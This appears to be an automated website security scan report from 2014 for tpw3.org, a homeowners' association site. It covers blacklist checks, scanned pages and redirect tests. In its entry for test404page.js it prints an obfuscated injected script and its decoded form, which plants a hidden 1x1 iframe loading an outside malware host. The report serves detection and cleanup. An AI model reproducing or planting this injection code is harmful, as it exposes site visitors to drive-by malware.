Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tpw3.org
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://tpw3.org/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://tpw3.org/ | 200 OK Content-Length: 7911 Content-Type: text/html | clean |
http://tpw3.org/Annual_Meeting_Minutes_January_2014.pdf | 200 OK Content-Length: 29144 Content-Type: application/pdf | clean |
http://tpw3.org/test404page.js | 404 Not Found Content-Length: 5969 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. var WnQnB="A%H43%H56%H45%H";var F7r0N="4CON27ONF6EON";var RHJoOw8m="5%1jL2E%1";var R2tZ="62ONF6";var ON9i1h="val(unescap";var azyBERny="f70p0f3Ap0f2F";var heiZ9J="74p0f74p0f65";var mwD18i8="8p0f27p0f69p0";var AMgw="6p0f61p0f72p0";var P2JRWKZ="27ONF6CON62O";var tO7yuj="%6A5gV%";var T26W2Clm="ON68ONF65";var iylHdTx="L2E%1jL76%1jL69";var RF9IVUwj="f.replace(/LPY/";var oUXIY=";var uXhWP7";var plk06TS="scape(Fkr";var jfPdz4X="4A5gV%747E5gV";var mXWl1i=" ...[3548 bytes skipped]... Decoded script: ...[4293 bytes skipped]... 3%1jL56%1jL45%1jL29%1jL3B';eval(unescape(uXhWP7.replace(/%1jL/g,'%'))); var Ih5k20="<div id='E5Ix2L'></div>";if(document.body==null)Ih5k20='<body>'+Ih5k20+'</body>';document.write (Ih5k20); var Ih5k20="<div id='E5Ix2L'></div>";if(document.body==null)Ih5k20='<body>'+Ih5k20+'</body>';document.write (Ih5k20); var JvRTbS=document.getElementById('E5Ix2L');var YjCVE=document.createElement('iframe');YjCVE.src='http://exist.butterflyeffect.gs/Trop'; var JvRTbS=document.getElementById('E5Ix2L');var YjCVE=document.createElement('iframe');YjCVE.src='http://exist.butterflyeffect.gs/Trop'; YjCVE.width='1';YjCVE.height='1'; YjCVE.width='1';YjCVE.height='1'; YjCVE.name='gLTJyO'; YjCVE.name='gLTJyO'; YjCVE.style.visibility='hidden';JvRTbS.appendChild(YjCVE); YjCVE.style.visibility='hidden';JvRTbS.appendChild(YjCVE); <div id='E5Ix2L'></div> | ||
http://tpw3.org/Treasurer%20Report%20for%20January%202014%20Annual%20Meeting.pdf | 200 OK Content-Length: 298184 Content-Type: application/pdf | clean |
http://tpw3.org/tpw3html/housesgallery.html | 200 OK Content-Length: 3430 Content-Type: text/html | clean |
http://tpw3.org/tpw3html/../images/lrfpfrombackdoor.jpg | 200 OK Content-Length: 40299 Content-Type: image/jpeg | clean |
http://tpw3.org/tpw3html/../images/foyerpetroglyph.jpg | 200 OK Content-Length: 44126 Content-Type: image/jpeg | clean |
http://tpw3.org/tpw3html/../images/kitchenalongsinkwall.jpg | 200 OK Content-Length: 59352 Content-Type: image/jpeg | clean |
http://tpw3.org/tpw3html/../images/kitchenfromsideboard.jpg | 200 OK Content-Length: 53750 Content-Type: image/jpeg | clean |
http://tpw3.org/tpw3html/../images/kitchensink.jpg | 200 OK Content-Length: 47030 Content-Type: image/jpeg | clean |
http://tpw3.org/tpw3html/../images/kitchensinkandammonite.jpg | 200 OK Content-Length: 49054 Content-Type: image/jpeg | clean |
http://tpw3.org/tpw3html/../images/lrpetroglyph.jpg | 200 OK Content-Length: 45489 Content-Type: image/jpeg | clean |
http://tpw3.org/tpw3html/../images/lrsofaacrossbar.jpg | 200 OK Content-Length: 51485 Content-Type: image/jpeg | clean |
http://tpw3.org/tpw3html/../images/mbrpetroglyph.jpg | 200 OK Content-Length: 46196 Content-Type: image/jpeg | clean |
http://tpw3.org/level1/Bylawsnew.html | 200 OK Content-Length: 22643 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: tpw3.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Oct 2014 08:39:31 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 7911
Content-Type: text/html
Last-Modified: Thu, 21 Aug 2014 03:44:18 GMT
...7911 bytes of data.
GET / HTTP/1.1
Host: tpw3.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Oct 2014 08:39:31 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 7911
Content-Type: text/html
Last-Modified: Thu, 21 Aug 2014 03:44:18 GMT
...7911 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: tpw3.org
Referer: http://www.google.com/search?q=tpw3.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: tpw3.org
Referer: http://www.google.com/search?q=tpw3.org
Result:
The result is similar to the first query. There are no suspicious redirects found.